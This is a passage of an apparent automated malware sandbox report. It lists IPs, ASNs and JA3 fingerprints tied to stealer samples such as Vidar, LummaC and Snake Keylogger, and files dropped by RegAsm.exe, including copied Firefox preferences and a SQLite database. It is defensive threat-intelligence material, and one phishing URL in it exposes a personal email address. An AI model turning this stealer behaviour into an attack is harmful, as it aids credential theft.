                                                                                                                                                                                                                                                          https://docs-metamask--learn--wallet.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                          • 142.250.185.238
                                                                                                                                                                                                                                                          UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                                                          • 142.250.184.206
                                                                                                                                                                                                                                                          mNPTwHOuvT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          • 172.217.18.14
                                                                                                                                                                                                                                                          build.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          • 142.250.185.238

                                                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                          TELEGRAMRUJUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                          • 149.154.167.220
                                                                                                                                                                                                                                                          UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          LINEGROUP-ASRUkthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                                                          • 85.192.29.60
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                                                          • 85.192.60.190
                                                                                                                                                                                                                                                          invoice_template.pdf.lnkGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                                                          • 85.192.60.190
                                                                                                                                                                                                                                                          a9rLzLY498.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                                          • 85.192.63.134
                                                                                                                                                                                                                                                          MtgwNNkkgT.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                                          • 85.192.63.134
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 85.192.63.194
                                                                                                                                                                                                                                                          xGSkelSjdu.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                                                                                                                          • 85.192.63.15
                                                                                                                                                                                                                                                          ImBetter.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 85.192.63.32
                                                                                                                                                                                                                                                          B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                                                                                                                          • 85.192.63.204
                                                                                                                                                                                                                                                          B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                                                                                                                          • 85.192.63.204
                                                                                                                                                                                                                                                          HETZNER-ASDEna.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                          • 88.198.246.242
                                                                                                                                                                                                                                                          JUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          • 116.203.166.124
                                                                                                                                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                          • 88.198.246.242
                                                                                                                                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                          • 88.198.246.242
                                                                                                                                                                                                                                                          http://id1223.adsalliance.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 144.76.236.44
                                                                                                                                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                          • 88.198.246.242
                                                                                                                                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                          • 88.198.246.242
                                                                                                                                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                          • 88.198.246.242
                                                                                                                                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                          • 88.198.246.242
                                                                                                                                                                                                                                                          http://aeromorning.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 94.130.0.82

                                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19JUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          • 116.203.166.124
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                                                                                          • 116.203.166.124
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          149876985-734579485.05.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 116.203.166.124
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 116.203.166.124
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 116.203.166.124
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 116.203.166.124
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 116.203.166.124
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 116.203.166.124
                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                          L7GNkeVm5e.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 116.203.166.124
                                                                                                                                                                                                                                                          • 149.154.167.99

                                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\16fct0

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9571
                                                                                                                                                                                                                                                          Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                          MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                          SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                          SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                          SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\3790hv

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\3wbaas

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\7gdjwt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\89zcjm

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\8g4wtj

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                          MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                          SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                          SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                          SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\cjeuk6

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                          MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                          SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                          SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                          SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\cjeuk6xb1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
